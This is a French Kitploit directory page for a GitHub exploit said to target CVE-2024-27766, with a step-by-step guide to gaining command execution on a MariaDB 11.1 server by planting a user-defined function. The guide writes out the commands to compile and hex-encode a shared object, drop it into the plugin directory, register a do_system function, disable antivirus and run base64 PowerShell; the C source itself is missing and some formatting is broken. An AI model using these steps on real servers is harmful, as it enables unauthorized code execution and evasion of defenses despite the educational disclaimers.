Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Mysql_CVE-2024-27766 — Exécution de code authentifiée dans la base de données | Kitploit
Outils/GitHubGitHub/hissec/mysql_cve-2024-27766
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges UtilesSécurité des Bases de Données
GitHubhissec/mysql_cve-2024-27766

Mysql_CVE-2024-27766

Exécution de code authentifiée dans la base de données

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Guide de reproduction de l'exploit (version du produit concernée : MariaDB 11.1)

Ce guide fournit des instructions étape par étape pour reproduire une attaque par fonction définie par l'utilisateur (UDF) sur un système de base de données. Veuillez noter que cet exploit peut fonctionner sur certains systèmes, mais il risque de ne pas fonctionner correctement sur les architectures 64 bits ou certaines compilations.

Avertissement : Ceci est uniquement à des fins éducatives. L'utilisation non autorisée de ces techniques est illégale et contraire à l'éthique.

Étapes pour reproduire l'attaque

1. Télécharger et préparer le code UDF

Tout d'abord, créez un fichier nommé exploit.c et ajoutez le code suivant :

root@kitploit:~

### 2. Compiler le code UDF

Compilez le code de l'exploit à l'aide du compilateur `x86_64-w64-mingw32-gcc` :

```bash
x86_64-w64-mingw32-gcc -g -c exploit.c

3. Créer un fichier objet partagé

Générez un fichier objet partagé (exploit.so) à partir du fichier objet compilé :

root@kitploit:~
x86_64-w64-mingw32-gcc -g -shared -Wl,-soname,exploit.so -o exploit.so exploit.o

4. Convertir le fichier objet partagé en hexadécimal

Utilisez xxd pour convertir le fichier .so au format hexadécimal :

root@kitploit:~
xxd -p exploit.so | tr -d '\n' > hex_value.txt

5. Charger la valeur hexadécimale dans la base de données

Copiez la valeur hexadécimale depuis hex_value.txt et exécutez la commande suivante dans votre base de données :

root@kitploit:~
DB> set @shell = 0x<hex_value>;

6. Déterminer le répertoire des plugins et déployer l'exploit

Trouvez le répertoire des plugins en exécutant :

root@kitploit:~
DB> select @@plugin_dir;

Ensuite, créez l'objet partagé de l'exploit dans le répertoire des plugins :

root@kitploit:~
DB> select binary @shell into dumpfile 'C:\\Program Files\\MariaDB 11.1\\lib\\plugin\\exploit.so';

Remarque : Ajustez le chemin en fonction de la configuration de votre système ou du répertoire de plugins spécifique.

7. Créer la fonction malveillante

Créez une nouvelle fonction dans la base de données à l'aide de l'exploit :

root@kitploit:~
DB> create function do_system returns integer soname 'exploit.so';

8. Exécuter l'exploit

Désactivez tout antivirus ou Windows Defender susceptible de bloquer l'exploit. Exécutez ensuite une commande à l'aide de la fonction nouvellement créée :

root@kitploit:~
DB> select do_system('powershell base64 here');

Remplacez 'powershell base64 here' par la charge utile encodée en base64 de la commande que vous souhaitez exécuter.


Avertissement : Ce document est destiné uniquement à des fins éducatives et de recherche en sécurité. Une mauvaise utilisation de ces informations peut entraîner des poursuites pénales et de lourdes sanctions juridiques. Obtenez toujours l'autorisation des autorités compétentes avant de tester toute vulnérabilité sur un réseau ou un système.

Télécharger l’outil